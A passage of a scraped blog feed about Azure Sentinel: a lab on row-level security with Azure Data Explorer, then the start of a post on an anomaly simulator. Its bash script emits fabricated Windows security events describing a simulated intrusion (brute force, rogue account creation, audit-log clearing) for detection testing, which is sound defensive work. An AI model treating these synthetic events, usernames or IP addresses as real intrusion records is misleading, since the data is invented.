width="13.763233878729547%" height="14px">Sam</TD> <TD width="13.089509143407122%" height="14px">UserWS</TD> <TD width="13.282001924927817%" height="14px">Ecart</TD> <TD width="6.833493743984601%" height="14px">22 Site</TD> <TD width="10.39461020211742%" height="14px" class="xl63">158.81.67.141</TD> <TD width="10.68334937439846%" height="14px">SIM-2</TD> <TD width="17.805582290664102%" height="14px">{userA@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">MI22</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_IL6112</TD> <TD width="13.763233878729547%" height="14px">Erik</TD> <TD width="13.089509143407122%" height="14px">ProcessCntrlAsset</TD> <TD width="13.282001924927817%" height="14px">PCN_NTPSrvr</TD> <TD width="6.833493743984601%" height="14px">611 Lab</TD> <TD width="10.39461020211742%" height="14px">192.168.1.80</TD> <TD width="10.68334937439846%" height="14px">PCN-1</TD> <TD width="17.805582290664102%" height="14px">{userB@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">IL611</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_IL6112</TD> <TD width="13.763233878729547%" height="14px">Erin</TD> <TD width="13.089509143407122%" height="14px">Engineering Wkstn</TD> <TD width="13.282001924927817%" height="14px">S7EWSBldg6</TD> <TD width="6.833493743984601%" height="14px">611 Bldg</TD> <TD width="10.39461020211742%" height="14px">192.168.1.81</TD> <TD width="10.68334937439846%" height="14px">PIN-1</TD> <TD width="17.805582290664102%" height="14px">{userB@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">IL611</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_IL6114</TD> <TD width="13.763233878729547%" height="14px">Elan</TD> <TD width="13.089509143407122%" height="14px">PLC</TD> <TD width="13.282001924927817%" height="14px">RTC_06</TD> <TD width="6.833493743984601%" height="14px">611 Site</TD> <TD width="10.39461020211742%" height="14px">192.168.67.81</TD> <TD width="10.68334937439846%" height="14px">SIM-1</TD> <TD width="17.805582290664102%" height="14px">{userB@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">IL611</TD> </TR> </TBODY> </TABLE> <LI-SPOILER><BR />In the Plant_Owner column, add a user from one of your RLS restricted security groups for userA, and from the other RLS restricted security group for userB.</LI-SPOILER> <P>Once you create and save this .csv, you can upload it to ADX:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_5-1633126241990.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314500i5F5EAA307BF5C4BD/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_5-1633126241990.png" alt="Beth_Bischoff_5-1633126241990.png" /></span></P> <P>&nbsp;</P> <H3><STRONG><U>Build policies for restricted access</U></STRONG></H3> <P>After your ingestion has succeeded, you'll build the Row Level Security Policy under "Query."</P> <OL> <LI>Create the function that filters the table:</LI> </OL> <P>&nbsp;</P> <LI-CODE lang="sql">.create-or-alter function with () Plant_Data() { let IsInGroup1 = current_principal_is_member_of('aadgroup=adxrls1;{tenantID}'); let IsInGroup2 = current_principal_is_member_of('aadgroup=adxrls2;{tenantID}'); let DataForGroup1 = CMDBData | where IsInGroup1 and site == ‘IL611’; let DataForGroup2 = CMDBData | where IsInGroup2 and site == ‘MI22’; union DataForGroup1, DataForGroup2} </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <LI-SPOILER> <P><FONT size="2">{tenantID} -is your AAD tenant ID (from AAD Overview Screen),</FONT></P> <P><FONT size="2">Plant_Data() -is the&nbsp;Function Name (on which you’ll enable the RLS policy),</FONT></P> <P><FONT size="2">CMDBData -is the&nbsp;original table that you created to ingest data, and</FONT></P> <P><FONT size="2">site ==&nbsp;“IL611";&nbsp;site&nbsp;==&nbsp;“MI22"; - are the keys for the permissions filter.</FONT></P> </LI-SPOILER> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_0-1633126746113.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314502i94D3691B1EF60194/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_0-1633126746113.png" alt="Beth_Bischoff_0-1633126746113.png" /></span></P> <P>&nbsp;</P> <P><FONT size="3">2. Create the RLS (Row Level Security) Policy based on the function above:</FONT></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">.alter table CMDBData policy row_level_security enable 'Plant_Data'</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <LI-SPOILER> <P><FONT size="2">CMDBData -is the original table that you created to ingest data, and</FONT></P> <P><FONT size="2">Plant_Data - is the function name on which you'll enable the RLS Policy.</FONT></P> </LI-SPOILER> <LI-SPOILER> <P>Note: Once a policy has been defined, only users explicitly granted permission to access the data via the filters defined in the query will be able to read any data from the tables.</P> <P>To only enforce the policy only at runtime and keep the data available to others while testing the function,</P> <P>Use the format:</P> <P>set&nbsp;query_force_row_level_security; Plant_Data</P> </LI-SPOILER> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_1-1633127178224.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314504i06B54F24119586B7/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_1-1633127178224.png" alt="Beth_Bischoff_1-1633127178224.png" /></span></P> <P>&nbsp;</P> <P>From here, you're ready to test the policy with the saved function name. Log on with on with one of the identities belonging to one of the restricted access security groups that you created earlier and you should see data only associated with site access for that user's group.&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_1-1633205868024.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314610i7A3C04C8FBAE3311/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_1-1633205868024.png" alt="Beth_Bischoff_1-1633205868024.png" /></span></P> <P>&nbsp;</P> <H3><STRONG><U>Ingest sample logs into Azure Sentinel</U></STRONG></H3> <P>For an added step, we would also like to align this with logs in Sentinel to ensure the sample works as desired. Using logger -p with a Linux collector, you can emulate a few activities to align to the IP addresses from the .csv file that you imported into your ADX cluster database.&nbsp;</P> <P>&nbsp;</P> <P>We've created a sample set that duplicates as a sample kill chain attack in Sentinel. This can be saved and run as a .sh script for ease of re-use if desired. Otherwise, just copy and paste in a CEF collector that's sending logs to Azure Sentinel.</P> <P>&nbsp;</P> <LI-SPOILER>This will also be useful for a follow-up blog post coming soon!</LI-SPOILER> <P>&nbsp;</P> <LI-CODE lang="bash">#! /bin/bash #NOW=`date '+%F %H:%M:%S'`; NOW=`date -u`; ###Brute Force Attack### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=$NOW end=$NOW suser= duser=StMarsh src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=$NOW end=$NOW suser= duser=KyBroflovski src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=KeMcCormick src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000072- account is currently disabled|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=BuStotch src=196.45.177.52 dst=158.81.26.141 shost= dhost= dstdestinationDnsDomain=dc.domain" ###Sleep for 5 seconds### sleep 5s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=$NOW end=$NOW suser= duser=WeTestaburger src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=$NOW end=$NOW suser= duser=TwTweak src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=BeStevens src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000072- account is currently disabled|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=BrBiggle src=196.45.177.52 dst=158.81.26.141 shost= dhost= dstdestinationDnsDomain=dc.domain" ###Sleep for 5 seconds### sleep 5s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=$NOW end=$NOW suser= duser=ClDonovan src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=$NOW end=$NOW suser= duser=CrTucker src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=JiValmer src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000072- account is currently disabled|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=TiBurch src=196.45.177.52 dst=158.81.26.141 shost= dhost= dstdestinationDnsDomain=dc.domain" ###Sleep for 5 seconds### sleep 5s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=$NOW end=$NOW suser= duser=RaMarsh src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=$NOW end=$NOW suser= duser=ShMarsh src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=JiKern src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000072- account is currently disabled|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=BrBiggle src=196.45.177.52 dst=158.81.26.141 shost= dhost= dstdestinationDnsDomain=dc.domain" ###Sleep for 5 seconds### sleep 5s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000064 - user name does not exist|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=$NOW end=$NOW suser= duser=GeBroflovski src=179.124.202.253 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC000006A - user name is correct but the password is wrong|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start=$NOW end=$NOW suser= duser=ShBroflovski src=113.160.112.125 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000234 - user is currently locked out|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=KySchwartz src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|0xC0000072- account is currently disabled|4625 - An account failed to log on.|1|act=Failure deviceExternalID=4625 start= end= suser= duser=JaTenorman src=196.45.177.52 dst=158.81.26.141 shost= dhost= dstdestinationDnsDomain=dc.domain" ###Sleep for 10 seconds### sleep 10s ###Successful login to one of the Brute Force targeted accounts; 158.81.26.141### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalID=4624 start= end= suser= duser=ErCartman src=196.45.177.52 dst=158.81.26.141 shost= dhost= destinationDnsDomain=dc.domain" ###Sleep for 30 seconds### sleep 30s ###Login to 172.16.1.4(DMZ_Workstation)### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalID=4624 start= end= suser= duser=ErCartman src=dst=172.16.1.4 shost= dhost=DMZ_Workstation destinationDnsDomain=dc.domain" ###Sleep for 60 seconds### sleep 60s ###Login to AD, change an existing IOT authorised user password create new user account, added to IOT authroized user group, reset password; 172.16.16.100 (dc.domain)### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalID=4624 start= end= suser=ErCartman duser=StMarsh-sa src=172.16.1.4 dst=172.16.16.100 shost=DMZ_Workstation dhost=dc.domain destinationDnsDomain=dc.domain" ###Sleep for 10 seconds### sleep 10s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4723 - An attempt was made to change an account's password|1|act=Failure deviceExternalID=4723 start= end= suser=StMarsh-sa duser=ErCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain" ###Sleep for 30 seconds### sleep 30s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4720 - A user account was created.|2|act=Success deviceExternalID=4720 start= end= suser=StMarsh-sa duser=LiCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain" logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4724 - An attempt was made to reset an account's password|2|act=Success deviceExternalID=4724 start= end= suser=StMarsh-sa duser=LiCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain" ###Sleep for 20 seconds### sleep 20s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4728 - A member was added to a security-enabled global group|2|act=Success deviceExternalID=4728 start= end= suser=StMarsh-sa duser=LiCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain dpriv=dc.domain\IOT-Engineering" ###Sleep for 60 seconds### sleep 60s ###Login to Process control asset; 192.168.1.80(PCN_NTPSrvr)### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalID=4624 start= end= suser=ErCartman duser=LiCartman-IOT src=172.16.1.4 dst=192.168.1.80 shost=DMZ_Workstation dhost=PCN_NTPSrvr destinationDnsDomain=dc.domain" ###Sleep for 60 seconds### sleep 60s ###Login to Engineering workstation; 192.168.1.81(S7EWSBldg6)### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10|10 - RemoteInteractive|4624 - An account was successfully logged on.|2|act=Success deviceExternalID=4624 start= end= suser=LiCartman-IOT duser=S7EWSBldg6\cooladmin src=192.168.1.80 dst=192.168.1.81 shost=PCN_NTPSrvr dhost=S7EWSBldg6 destinationDnsDomain= " ###Sleep for 120 seconds### sleep 120s ###Delete log traces - remove group membership, delete account, clear audit logs### logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10||1102 - The audit log was cleared|2|act=Success deviceExternalID=1102 start= end= suser=cooladmin duser= src=dst=192.168.1.81 shost= dhost=S7EWSBldg6 destinationDnsDomain=S7EWSBldg6" ###Sleep for 30 seconds### sleep 30s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10||1102 - The audit log was cleared|2|act=Success deviceExternalID=1102 start= end= suser=LiCartman-IOT duser= src=dst=192.168.1.80 shost= dhost=PCN_NTPSrvr destinationDnsDomain=dc.domain" ###Sleep for 30 seconds### sleep 30s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4729 - A member was removed from a security-enabled global group|2|act=Success deviceExternalID=4729 start= end= suser=StMarsh-sa duser=LiCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain dpriv=dc.domain\IOT-Engineering" ###Sleep for 30 seconds### sleep 30s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||4726 - A user account was deleted.|2|act=Success deviceExternalID=4726 start= end= suser=StMarsh-sa duser=LiCartman-IOT src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain=dc.domain" ###Sleep for 30 seconds### sleep 30s logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|10||1102 - The audit log was cleared|2|act=Success deviceExternalID=1102 start= end= suser=ErCartman duser= src=dst=172.16.1.4 shost= dhost=DMZ_Workstation destinationDnsDomain= " logger -p auth.info -n localhost -t CEF "CEF:0|Microsoft|Microsoft-Windows-Security-Auditing|2019||1102 - The audit log was cleared|2|act=Success deviceExternalID=1102 start= end= suser=StMarsh-sa duser= src=dst=172.16.16.100 shost= dhost=dc.domain destinationDnsDomain= " </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <H3><STRONG><U>Build cross-solution workbook</U></STRONG></H3> <P>Now we're ready to build the cross-solution workbook in Azure Sentinel. The first step we recommend is to test your external data query in your Sentinel logs and then validate the IP address match to the sample CEF logs you ran above.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">adx("cmdbdata.eastus/CMDB_Sample").Plant_Data //(Name of Cluster, reference in adx database) | join (CommonSecurityLog) on $left.IPAddress == $right.DestinationIP | summarize count() by DeviceAction </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_2-1633206100588.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314611i270C5142199DF7A5/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_2-1633206100588.png" alt="Beth_Bischoff_2-1633206100588.png" /></span></P> <P>&nbsp;</P> <P>From here, you can create a new workbook to visualize the completely different access views to row level restricted data based on the security group to which each authenticated user belongs.</P> <P>&nbsp;</P> <LI-SPOILER><STRONG>Don't forget to save your workbook progress!</STRONG></LI-SPOILER> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_0-1633127548169.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314508i85ABC0F50FE316AB/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_0-1633127548169.png" alt="Beth_Bischoff_0-1633127548169.png" /></span></P> <P><A href="#" target="_blank" rel="noopener">"join"</A> flavor Hint:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_2-1633127615832.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314510i085329F993EAF10F/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_2-1633127615832.png" alt="Beth_Bischoff_2-1633127615832.png" /></span></P> <P>&nbsp;</P> <P>Your sample deliverable from this exercise should be the ability to access the same workbook in Azure Sentinel as two different users from two different security groups to see entirely different sets of data.</P> <P>&nbsp;</P> <LI-SPOILER> <P>Here are a couple simple sample queries to start with for your workbook:</P> <LI-CODE lang="sql">adx("{ADXClusterName.region/DatbaseName}").Plant_Data | join (CommonSecurityLog) on $left.IPAddress == $right.DestinationIP | where TimeGenerated &gt;= (7d)</LI-CODE><LI-CODE lang="sql">adx("{ADXClusterName.region/DatabaseName}").Plant_Data | join (CommonSecurityLog) on $left.IPAddress == $right.DestinationIP | summarize Successful_Connection = countif(DeviceAction=="Success" or DeviceAction=="Successful" or DeviceAction=="accept"), Failed_Connection = countif(DeviceAction=="Failure") by DeviceEventClassID, DestinationIP</LI-CODE> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_3-1633207074756.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314612iEAA2715CA65B5F2F/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_3-1633207074756.png" alt="Beth_Bischoff_3-1633207074756.png" /></span></P> </LI-SPOILER> <P>We hope you had fun with this lab exercise and can think of some other uses for this ability to provide Row Level Access Restrictions in Azure Sentinel using Azure Data Explorer!</P> <P>&nbsp;</P> <P>Special thanks to co-authors&nbsp;<LI-USER uid="703683"></LI-USER>&nbsp;and&nbsp;<LI-USER uid="94294"></LI-USER>&nbsp; and also thanks to&nbsp;<LI-USER uid="592173"></LI-USER>,&nbsp;who's post&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/microsoft-365-defender/blog-series-limitless-advanced-hunting-with-azure-data-explorer/ba-p/2328705" target="_blank" rel="noopener">Limitless Microsoft Defender for Endpoint Advanced Hunting with Azure Data Explorer (ADX)</A>&nbsp;was the inspiration for this solution!</P> Thu, 07 Oct 2021 05:19:59 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/simple-row-based-access-workbook-lab-walk-through-with-azure/ba-p/2804446 Beth_Bischoff 2021-10-07T05:19:59Z The Azure Sentinel Anomalies Simulator https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/the-azure-sentinel-anomalies-simulator/ba-p/2738393 <H2>Introduction</H2> <P>&nbsp;</P> <P>We are pleased to announce the “Unusual Mass Downgrade AIP Label” anomaly simulator, the first in a series of simulators for Azure Sentinel Anomalies. This simulator will populate the table in Azure Sentinel monitored by the relevant anomaly rule with simulated data. This simulated data will trigger an anomaly. You can review the anomaly by querying the Anomalies table for the anomaly rule’s name. These simulators will enable users to validate that an anomaly rule works in their Sentinel workspace.</P> <P>&nbsp;</P> <H2>What is the Unusual Mass Downgrade AIP rule?</H2> <P>&nbsp;</P> <P><SPAN class="TextRun SCXW174255315 BCX0" data-contrast="none"><SPAN class="NormalTextRun SCXW174255315 BCX0">The anomaly rule<SPAN>&nbsp;</SPAN></SPAN></SPAN><SPAN class="TextRun SCXW174255315 BCX0" data-contrast="none"><SPAN class="NormalTextRun SCXW174255315 BCX0">"Unusual Mass Downgrade AIP Label"</SPAN></SPAN><SPAN class="TextRun SCXW174255315 BCX0" data-contrast="none"><SPAN class="NormalTextRun SCXW174255315 BCX0"><SPAN>&nbsp;</SPAN>detects unusual high volume of downgrade label activity in Azure Information Protection (AIP) logs. It considers "AIP" workload records for a given number of days and determines the sequence of activity performed on documents along with the label applied to classify unusual volume of downgrade activity.<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW174255315 BCX0">Anomalies are saved to the<SPAN>&nbsp;</SPAN></SPAN></SPAN><SPAN class="TextRun SCXW174255315 BCX0" data-contrast="none"><SPAN class="NormalTextRun SCXW174255315 BCX0">Anomalies</SPAN></SPAN><SPAN class="TextRun SCXW174255315 BCX0" data-contrast="none"><SPAN class="NormalTextRun SCXW174255315 BCX0"><SPAN>&nbsp;</SPAN>table in your Azure Sentinel workspace. No alerts or incidents are generated by these anomalies. You can use anomalies to correlate with other signals to build threat detections, investigate an incident, or hunt for malicious actors.</SPAN></SPAN><SPAN class="EOP SCXW174255315 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:228,&quot;335559739&quot;:54,&quot;335559740&quot;:259,&quot;335559991&quot;:10}">&nbsp;</SPAN></P> <H2>&nbsp;</H2> <H2>Value for your Organization&nbsp;</H2> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="none">End to End visibility -&nbsp;</SPAN></STRONG><SPAN data-contrast="none">Enables analysts to gain a deeper understanding of the anomaly rules&nbsp;by injecting&nbsp;</SPAN><SPAN data-contrast="none">simulated&nbsp;data while&nbsp;limiting impacts to production security operations. Familiarization with signals such as those identified in an anomaly rule can assist in production detection and deepen skills necessary to effectively identify malicious behaviors</SPAN><SPAN>&nbsp;</SPAN><SPAN>.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:223,&quot;335559739&quot;:397,&quot;335559740&quot;:265,&quot;335559991&quot;:10}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:583,&quot;335559739&quot;:54,&quot;335559740&quot;:265,&quot;335559991&quot;:10}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="none">Training,&nbsp;Building&nbsp;SOPs, Workflows, Playbooks</SPAN></STRONG><SPAN data-contrast="none">&nbsp;– SOC operations rely on standardized responses, new rules require&nbsp;periods of observation by&nbsp;analysts&nbsp;to become familiar with the signals and indicators.&nbsp;The anomaly simulator provides a mechanism whereby&nbsp;analysts&nbsp;can preview the associated anomaly&nbsp;information&nbsp;broadly without compromising normal production analysis.&nbsp;</SPAN><SPAN>&nbsp;</SPAN><SPAN data-contrast="none">Subsequent development of SOPs, Workflows and playbooks can&nbsp;complement&nbsp;training programs and overall knowledge enhancement.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:583,&quot;335559739&quot;:57,&quot;335559740&quot;:259,&quot;335559991&quot;:10}">&nbsp;</SPAN></P> <H2>&nbsp;</H2> <H2>Configuration Steps:</H2> <P>&nbsp;</P> <P><EM><STRONG>Source code</STRONG></EM> for the anomalies simulator is available on the Azure Sentinel&nbsp;<A href="#" target="_blank" rel="noopener"><STRONG><EM>Tools Simulators</EM></STRONG> GitHub&nbsp;</A>space.&nbsp;</P> <P>&nbsp;</P> <H3><FONT size="3"><STRONG>Configure the Script</STRONG></FONT></H3> <UL> <LI>Edit the <EM>writetoLA-AIPMassDowngrade.txt</EM> file found on GitHub, save as PowerShell script (PS)</LI> </UL> <P>&nbsp;**Ensure your Log Analytics ID, Workspace ID and Tenant ID are correctly entered into the script</P> <DIV id="tinyMceEditorChuckW_3" class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Edit-PS.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/309464iFEE567E0B10E417E/image-size/large?v=v2&amp;px=999" role="button" title="Edit-PS.gif" alt="Edit-PS.gif" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Execute the Script&nbsp;</STRONG></P> <UL> <LI>Open your Azure Sentinel workspace and the Command Line Interface (CLI), <UL> <LI>Upload PS and .csv files</LI> <LI>Execute the script in the Azure CLI with the following command line; <STRONG>&amp; './WriteToLA - AIPMassDowngrade.ps1'</STRONG></LI> </UL> </LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="powershell">&amp; './WriteToLA - AIPMassDowngrade.ps1'</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Importcsv.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/309465iC4047DB08D423C11/image-size/large?v=v2&amp;px=999" role="button" title="Importcsv.gif" alt="Importcsv.gif" /></span><BR /></STRONG></P> <P>&nbsp;</P> <P><STRONG>Review the InformationProtection_CL table entries</STRONG></P> <P>KQL query:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="powershell">InformationProtectionLogs_CL | where ProtectionType_s == "Simulated" and Operation_s == "AcquireLicense" and Activity_s == "DowngradeLabel"</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-center" 